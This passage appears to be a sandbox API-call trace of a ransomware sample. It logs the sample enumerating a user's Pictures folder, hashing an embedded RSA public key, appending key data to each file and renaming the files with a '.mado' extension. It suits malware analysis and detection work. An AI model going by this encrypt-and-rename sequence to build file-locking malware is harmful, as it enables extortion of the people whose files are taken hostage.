CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.297] GetLastError () returned 0x0 [0207.297] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.297] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0207.297] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.297] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.297] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.297] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c8d0 [0207.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.297] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x44d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.297] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0207.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0207.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0207.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.298] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0207.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0207.298] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.298] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.298] CloseHandle (hObject=0x63c) returned 1 [0207.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x110) returned 0x3b836a8 [0207.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x920) returned 0x3b7b950 [0207.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b836a8 | out: hHeap=0x2c0000) returned 1 [0207.299] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\mj0rmewqojJ5SAim5W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\mj0rmewqojj5saim5w.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\mj0rmewqojJ5SAim5W.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\mj0rmewqojj5saim5w.bmp.mado")) returned 1 [0207.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.300] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0207.301] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x114a83a0, ftCreationTime.dwHighDateTime=0x1d5df88, ftLastAccessTime.dwLowDateTime=0x1bfb4ec0, ftLastAccessTime.dwHighDateTime=0x1d5e0b3, ftLastWriteTime.dwLowDateTime=0x1bfb4ec0, ftLastWriteTime.dwHighDateTime=0x1d5e0b3, nFileSizeHigh=0x0, nFileSizeLow=0xf36d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PS3YD.gif", cAlternateFileName="")) returned 1 [0207.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b677b8 [0207.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14e) returned 0x3294350 [0207.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b677b8 | out: hHeap=0x2c0000) returned 1 [0207.301] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\PS3YD.gif") returned=".gif" [0207.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\PS3YD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\ps3yd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.302] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=62317) returned 1 [0207.302] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.304] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf347, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.304] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.305] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.305] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xf36d, lpOverlapped=0x0) returned 1 [0207.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.306] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.306] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0207.307] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.307] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.307] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.307] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.307] GetLastError () returned 0x0 [0207.307] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.307] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0207.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0207.307] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.307] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.307] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf370) returned 0x3b87c98 [0207.308] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0207.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b876d0 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e30 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87718 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e48 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e78 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ec0 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79e90 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0207.308] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c8d0 [0207.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e78 | out: hHeap=0x2c0000) returned 1 [0207.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e90 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ec0 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ec0 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79e90 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79e78 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b836a8 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b837c0 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b836a8 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e90 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79e78 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ec0 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0207.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0207.309] GetCurrentThreadId () returned 0x600 [0207.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b817b0 [0207.310] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xf36d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.310] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b817b0 | out: hHeap=0x2c0000) returned 1 [0207.310] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.310] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.310] CloseHandle (hObject=0x63c) returned 1 [0207.312] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\PS3YD.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\ps3yd.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\PS3YD.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\ps3yd.gif.mado")) returned 1 [0207.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0207.313] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3294350 | out: hHeap=0x2c0000) returned 1 [0207.314] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x114a83a0, ftCreationTime.dwHighDateTime=0x1d5df88, ftLastAccessTime.dwLowDateTime=0x1bfb4ec0, ftLastAccessTime.dwHighDateTime=0x1d5e0b3, ftLastWriteTime.dwLowDateTime=0x1bfb4ec0, ftLastWriteTime.dwHighDateTime=0x1d5e0b3, nFileSizeHigh=0x0, nFileSizeLow=0xf36d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PS3YD.gif", cAlternateFileName="")) returned 0 [0207.314] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.314] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd78 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3293068 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d64f0 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6810 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d68d8 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bf70 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef1c0 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b816a8 | out: hHeap=0x2c0000) returned 1 [0207.315] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.315] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.315] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.315] PathFindFileNameW (pszPath="") returned="" [0207.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67d28 | out: hHeap=0x2c0000) returned 1 [0207.316] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.316] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.316] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87718 | out: hHeap=0x2c0000) returned 1 [0207.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67248 | out: hHeap=0x2c0000) returned 1 [0207.316] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.316] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 